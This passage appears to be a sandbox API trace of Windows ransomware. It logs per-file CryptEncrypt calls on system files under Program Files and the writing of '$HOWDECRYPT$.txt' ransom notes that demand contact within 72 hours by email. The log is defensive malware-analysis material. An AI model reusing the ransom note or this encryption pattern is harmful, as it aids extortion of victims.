lpOverlapped=0x0) returned 1 [0091.734] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.734] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57feac, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57feac*=0x2ac, lpOverlapped=0x0) returned 1 [0091.734] CloseHandle (hObject=0x178) returned 1 [0091.735] GetProcessHeap () returned 0x2c0000 [0091.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f418 | out: hHeap=0x2c0000) returned 1 [0091.735] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe48 | out: pbBuffer=0x57fe48) returned 1 [0091.735] GetProcessHeap () returned 0x2c0000 [0091.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.736] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe40*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe40*=0x30) returned 1 [0091.736] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadrh15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.761] GetProcessHeap () returned 0x2c0000 [0091.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.761] GetProcessHeap () returned 0x2c0000 [0091.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d358 | out: hHeap=0x2c0000) returned 1 [0091.761] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe48 | out: pbBuffer=0x57fe48) returned 1 [0091.761] GetProcessHeap () returned 0x2c0000 [0091.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.761] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe40*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe40*=0x30) returned 1 [0091.761] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.761] GetProcessHeap () returned 0x2c0000 [0091.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.761] GetProcessHeap () returned 0x2c0000 [0091.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ced8 | out: hHeap=0x2c0000) returned 1 [0091.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe40 | out: pbBuffer=0x57fe40) returned 1 [0091.762] GetProcessHeap () returned 0x2c0000 [0091.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.762] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe38*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe38*=0x30) returned 1 [0091.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.762] GetProcessHeap () returned 0x2c0000 [0091.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.762] GetProcessHeap () returned 0x2c0000 [0091.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ce18 | out: hHeap=0x2c0000) returned 1 [0091.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe40 | out: pbBuffer=0x57fe40) returned 1 [0091.762] GetProcessHeap () returned 0x2c0000 [0091.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.762] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe38*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe38*=0x30) returned 1 [0091.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.763] GetProcessHeap () returned 0x2c0000 [0091.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.763] GetProcessHeap () returned 0x2c0000 [0091.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cd58 | out: hHeap=0x2c0000) returned 1 [0091.763] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe38 | out: pbBuffer=0x57fe38) returned 1 [0091.763] GetProcessHeap () returned 0x2c0000 [0091.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.763] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe30*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe30*=0x30) returned 1 [0091.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.764] GetProcessHeap () returned 0x2c0000 [0091.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.764] GetProcessHeap () returned 0x2c0000 [0091.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cc98 | out: hHeap=0x2c0000) returned 1 [0091.764] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe38 | out: pbBuffer=0x57fe38) returned 1 [0091.764] GetProcessHeap () returned 0x2c0000 [0091.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.764] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe30*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe30*=0x30) returned 1 [0091.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.764] GetProcessHeap () returned 0x2c0000 [0091.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.764] GetProcessHeap () returned 0x2c0000 [0091.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cbd8 | out: hHeap=0x2c0000) returned 1 [0091.764] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe30 | out: pbBuffer=0x57fe30) returned 1 [0091.765] GetProcessHeap () returned 0x2c0000 [0091.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.765] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe28*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe28*=0x30) returned 1 [0091.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.765] GetProcessHeap () returned 0x2c0000 [0091.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.765] GetProcessHeap () returned 0x2c0000 [0091.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cb18 | out: hHeap=0x2c0000) returned 1 [0091.765] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe30 | out: pbBuffer=0x57fe30) returned 1 [0091.765] GetProcessHeap () returned 0x2c0000 [0091.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.765] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe28*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe28*=0x30) returned 1 [0091.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.770] GetProcessHeap () returned 0x2c0000 [0091.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.770] GetProcessHeap () returned 0x2c0000 [0091.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ca58 | out: hHeap=0x2c0000) returned 1 [0091.770] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe28 | out: pbBuffer=0x57fe28) returned 1 [0091.770] GetProcessHeap () returned 0x2c0000 [0091.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.770] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe20*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe20*=0x30) returned 1 [0091.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.770] GetProcessHeap () returned 0x2c0000 [0091.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.771] GetProcessHeap () returned 0x2c0000 [0091.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329f48 | out: hHeap=0x2c0000) returned 1 [0091.771] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe28 | out: pbBuffer=0x57fe28) returned 1 [0091.771] GetProcessHeap () returned 0x2c0000 [0091.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.771] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe20*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe20*=0x30) returned 1 [0091.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.771] GetProcessHeap () returned 0x2c0000 [0091.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.771] GetProcessHeap () returned 0x2c0000 [0091.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34c998 | out: hHeap=0x2c0000) returned 1 [0091.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\speechengines\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.772] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.772] WriteFile (in: hFile=0x178, lpBuffer=0x57fd57*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fe80, lpOverlapped=0x0 | out: lpBuffer=0x57fd57*, lpNumberOfBytesWritten=0x57fe80*=0x127, lpOverlapped=0x0) returned 1 [0091.772] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.773] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fe80, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fe80*=0x2ac, lpOverlapped=0x0) returned 1 [0091.773] CloseHandle (hObject=0x178) returned 1 [0091.773] GetProcessHeap () returned 0x2c0000 [0091.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3582d0 | out: hHeap=0x2c0000) returned 1 [0091.774] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.774] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.774] WriteFile (in: hFile=0x178, lpBuffer=0x57fd53*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fe7c, lpOverlapped=0x0 | out: lpBuffer=0x57fd53*, lpNumberOfBytesWritten=0x57fe7c*=0x127, lpOverlapped=0x0) returned 1 [0091.775] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.775] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fe7c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fe7c*=0x2ac, lpOverlapped=0x0) returned 1 [0091.776] CloseHandle (hObject=0x178) returned 1 [0091.776] GetProcessHeap () returned 0x2c0000 [0091.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346d48 | out: hHeap=0x2c0000) returned 1 [0091.776] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.776] GetProcessHeap () returned 0x2c0000 [0091.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f508 | out: hHeap=0x2c0000) returned 1 [0091.776] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe18 | out: pbBuffer=0x57fe18) returned 1 [0091.776] GetProcessHeap () returned 0x2c0000 [0091.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.776] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe10*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe10*=0x30) returned 1 [0091.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttsloc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.777] GetProcessHeap () returned 0x2c0000 [0091.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.777] GetProcessHeap () returned 0x2c0000 [0091.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378390 | out: hHeap=0x2c0000) returned 1 [0091.778] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe10 | out: pbBuffer=0x57fe10) returned 1 [0091.778] GetProcessHeap () returned 0x2c0000 [0091.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.778] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe08*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe08*=0x30) returned 1 [0091.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttsengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.778] GetProcessHeap () returned 0x2c0000 [0091.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.778] GetProcessHeap () returned 0x2c0000 [0091.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3782a8 | out: hHeap=0x2c0000) returned 1 [0091.778] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe10 | out: pbBuffer=0x57fe10) returned 1 [0091.778] GetProcessHeap () returned 0x2c0000 [0091.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.778] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe08*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe08*=0x30) returned 1 [0091.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttscommon.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.778] GetProcessHeap () returned 0x2c0000 [0091.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.778] GetProcessHeap () returned 0x2c0000 [0091.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3781c0 | out: hHeap=0x2c0000) returned 1 [0091.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.779] GetProcessHeap () returned 0x2c0000 [0091.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355790 | out: hHeap=0x2c0000) returned 1 [0091.779] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe08 | out: pbBuffer=0x57fe08) returned 1 [0091.779] GetProcessHeap () returned 0x2c0000 [0091.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.779] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe00*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe00*=0x30) returned 1 [0091.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsloc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.779] GetProcessHeap () returned 0x2c0000 [0091.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.779] GetProcessHeap () returned 0x2c0000 [0091.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355698 | out: hHeap=0x2c0000) returned 1 [0091.779] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe00 | out: pbBuffer=0x57fe00) returned 1 [0091.779] GetProcessHeap () returned 0x2c0000 [0091.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.779] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fdf8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fdf8*=0x30) returned 1 [0091.780] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsfrontendenu.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.780] GetProcessHeap () returned 0x2c0000 [0091.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.780] GetProcessHeap () returned 0x2c0000 [0091.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a360 | out: hHeap=0x2c0000) returned 1 [0091.780] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.780] GetProcessHeap () returned 0x2c0000 [0091.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 